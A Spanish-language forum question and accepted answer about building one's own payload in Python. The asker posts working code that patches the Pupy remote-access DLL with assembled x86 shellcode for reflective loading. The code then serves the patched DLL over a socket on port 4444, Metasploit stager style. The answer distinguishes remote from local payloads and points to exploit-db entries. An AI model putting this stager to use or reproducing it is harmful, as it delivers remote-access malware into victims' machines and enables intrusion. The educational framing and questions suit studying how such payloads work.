# Crear mi propio payload en python

Tags: python

Hola como el nombre indica estoy intentando crear mi propio payload en python ya que siempre he tenido curiosidad de como se hacen o como se montan. Bueno el siguiente código en principio sería un payload hecho en python(corregirme si me equivoco en algo). Este es:

```
import struct
import socket
import sys

import pefile
import keystone

exit_types = {
      ''        : 0,          # Default to nothing
      'seh'     : 0xEA320EFE, # SetUnhandledExceptionFilter
      'thread'  : 0x0A2A1DE0, # ExitThread
      'process' : 0x56A2B5F0, # ExitProcess
      'none'    : 0x5DE2C5AA  # GetLastError
}

def create_payload(source='pupy.dll', exit='thread'):
    dll = open(source, 'rb').read()
    pe = pefile.PE(data=dll)

    offset = 0

    ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_32)
    ks.syntax = keystone.KS_OPT_SYNTAX_INTEL

    for entry in pe.DIRECTORY_ENTRY_EXPORT.symbols:
        if 'ReflectiveLoader' in entry.name:
            offset = pe.get_offset_from_rva(entry.address)
            break

    print '[+] Reflective loader offset: {}'.format(offset)

    asm = '''
          dec ebp               ; 'M'
          pop edx               ; 'Z'
          call 7                ; call next instruction
          pop ebx               ; get the current location (+7 bytes)
          push edx              ; restore edx
          inc ebp               ; restore ebp
          push ebp              ; save ebp for later
          mov ebp, esp          ; set up a new stack frame
          ; Invoke ReflectiveLoader()
          ; add the offset to ReflectiveLoader() (0x????????)
          add ebx, 0x{rdi:08x}
          call ebx              ; invoke ReflectiveLoader()
          ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
          push edi              ; push the socket handle
          push 4                ; indicate that we have attached
          push eax              ; push some arbitrary value for hInstance
          mov ebx, eax          ; save DllMain for another call
          call ebx              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
          ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
          ; push the exitfunk value onto the stack
          push 0x{exit:08x}
          push 5                ; indicate that we have detached
          push eax              ; push some arbitrary value for hInstance
          call ebx              ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
    '''.format(rdi=offset-7, exit=exit_types[exit])

    bytecode, _ = ks.asm(asm)
    bytecode = ''.join(map(chr, bytecode))

    dll = bytecode + dll[len(bytecode):]

    return dll


s = socket.socket()
s.bind(("0.0.0.0", 4444))
s.listen(10) # Acepta hasta 10 conexiones entrantes.

payload = create_payload()

while True:
    sc, address = s.accept()
    print address
    sc.send(struct.pack('<I', len(payload)))
    x = sc.send(payload)
    print 'Sent: {}/{}'.format(x, len(payload))
```

En este caso generaría un payload para pupy que es un proyecto open source con fines educativos. Entonces que se supone el shellcode sería lo que se encuentra en ensamblador o asm y todo el código sería un payload. Es más bien pregunta genérica en la que intento mostrar algun ejemplo de como hacer mi propio payload con su propio shellcode(script) aunque sea un ejemplo conocido y más o menos entender un poco que formaría parte de mi payload y el shellcode (mi script).

Answer (score 1, accepted):

Bueno depende del payload si es remoto o local, por ejemplo si es un servicio(remoto) y tienes el exploit para ese servicio solo es crear un fragmento de ASM y pasarlo a Shellcode como el siguiente [link](https://www.exploit-db.com/exploits/9613/) o si es local como el siguiente [link](https://www.exploit-db.com/exploits/39417/).

creo que en ejemplo que pasastes carga una forma de dll inyeccion y la manda cuando se conecta el cliente, en este caso seria remoto pero el cliente debe  tener el programa y la version con que trabaja este exploit.